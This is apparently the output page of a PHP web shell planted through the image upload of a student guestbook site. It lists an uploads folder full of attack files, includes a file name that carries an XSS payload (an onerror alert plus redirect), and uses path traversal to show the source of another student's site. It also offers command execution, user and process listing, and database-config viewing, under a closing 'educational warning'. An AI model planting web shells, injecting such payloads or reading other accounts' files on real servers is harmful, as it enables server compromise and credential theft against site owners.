🐚 WEB SHELL ACTIVATED

πŸ“ File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

πŸ“„ ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
πŸ“ ..
πŸ“„ 003b15869ae62d2ceeee451a5f652dd6.png [view]
πŸ“„ 0tk5j14v024b1.jpg [view]
πŸ“„ 300px-Cursed_Cat.jpg [view]
πŸ“„ 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
πŸ“„ Bill-Gates-Paul-Allen-2013.jpg [view]
πŸ“„ CV Jasper Kramp.png [view]
πŸ“„ Cat profile.png [view]
πŸ“„ Fronalpstock_big.jpg [view]
πŸ“„ Krik en las.jpg [view]
πŸ“„ Krik.jpg [view]
πŸ“„ Pino-dood-03.jpg [view]
πŸ“„ Shellz.php [view]
πŸ“„ Ted_Kaczynski_2_(cropped).jpg [view]
πŸ“„ Tux.svg.png [view]
πŸ“„ Z.png [view]
πŸ“„ android.jpg [view]
πŸ“„ apple.php [view]
πŸ“„ cianancatfish.jpg [view]
πŸ“„ downloads (1).jpeg [view]
πŸ“„ downloads.jpeg [view]
πŸ“„ epresso.jpg [view]
πŸ“„ fake_photo.png [view]
πŸ“„ hand.jpg [view]
πŸ“„ https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
πŸ“„ image.png [view]
πŸ“„ images.jpeg [view]
πŸ“„ info.php [view]
πŸ“„ inject.php [view]
πŸ“„ instant_redirect.jpg [view]
πŸ“„ japper.jpg [view]
πŸ“„ koekiemonster-3.jpg [view]
πŸ“„ logo.png [view]
πŸ“„ muis.jpg [view]
πŸ“„ people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
πŸ“„ picobellobv.jpeg [view]
πŸ“„ redirect.php [view]
πŸ“„ rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
πŸ“„ sdfsa.png [view]
πŸ“„ sneaky.svg [view]
πŸ“„ taylor.webp [view]
πŸ“„ test.html [view]
πŸ“„ testpreg.php [view]
πŸ“„ testpreg1.php [view]
πŸ“„ testtest.php.JPG [view]
πŸ“„ ultimate_attack.gif [view]
πŸ“„ ultimate_attack.php [view]
πŸ“„ ultimate_attack.svg [view]
πŸ“„ wallpaper.jpg [view]
πŸ“„ webshell.php [view]

πŸ“„ Viewing: ./../../../../584683.klas4s23.mid-ica.nl/public_html/../public_html/Gastenboek/index.php

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="gastenboek.css">
    <link rel="icon" type="image/x-icon" href="images/cat.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Whisper&display=swap" rel="stylesheet">
    <link rel=”stylesheet” href=”https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css”>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <script type="text/javascript" src="https://www.viralpatel.net/demo/jquery/jquery.shorten.1.0.js"></script>
    <title>Nancy's guestbook</title>
</head>

<body>
    <form action="extra/upload.php" method="post" enctype="multipart/form-data">
        <div class="formPlacement">
            <h1>Guestbook</h1>
            <h1 id="nancy">Nancy<img id="nameIcon" src="images/cat.png"></h1>
            <label>Name:</label>
                <input type="text" name="name" id="name" class="inputFields"
                placeholder="(Limit 30char)" maxlength="30" required>
            <label>E-mail:</label>
                <input type="text" name="email" id="email" class="inputFields"
                placeholder="(Limit 100char)" maxlength="100" required>
            <label>Image (optional)</label>
            <label id="chooseText">Choose an image </label>
            <label id="requirementText">
                (can
                only be a <span class="details">.png, .jpg, .jpeg</span> or <span class="details">.gif</span> )<br>
                Max file size <span class="details">10 MB</span></label>
            <input type="file" name="uploadedFile"></input>
            <label>Comment:</label><textarea name="comment" id="comment" class="inputFields" rows="5" cols="40"
                placeholder="(Limit 255char)" maxlength="255" required></textarea>
            <p id="error"></p>
            <button name="uploadButton" id="submit">Submit</button>
        </div>
        <div class="commentsPlacement">
            <div id="comments">
                <?php
                require_once "extra/display.php";
                ?>
            </div>
        </div>
    </form>
    <script>
        //restrictions frontend
        document.getElementById("name").addEventListener("blur", function (event) {
            myFunction(event)
        });
        document.getElementById("email").addEventListener("blur", function (event) {
            myFunction(event)
        });
        document.getElementById("comment").addEventListener("blur", function (event) {
            myFunction(event)
        });

        function myFunction(event) {
            if (event.target.value == "") {
                event.target.style.borderColor = "red";
                document.getElementById("error").style.display = "block";
                document.getElementById("error").innerHTML = "Please fill all the fields in.";
            } else {
                event.target.style.borderColor = "#ded2b4";
                document.getElementById("error").innerHTML = "";
                document.getElementById("error").style.display = "none";
            }
        }

        //show more/less jquery plugin
        $(".commentContent").shorten({
            "showChars": 22,
            "moreText": "See More",
            "lessText": "Less",
        });
    </script>
</body>

</html>

🎯 Available Actions

Command Execution:

Quick Commands:

πŸ“‹ List files | πŸ‘€ Show user | πŸ“ Show directory | πŸ”„ Show processes | πŸ” Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | πŸ” View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!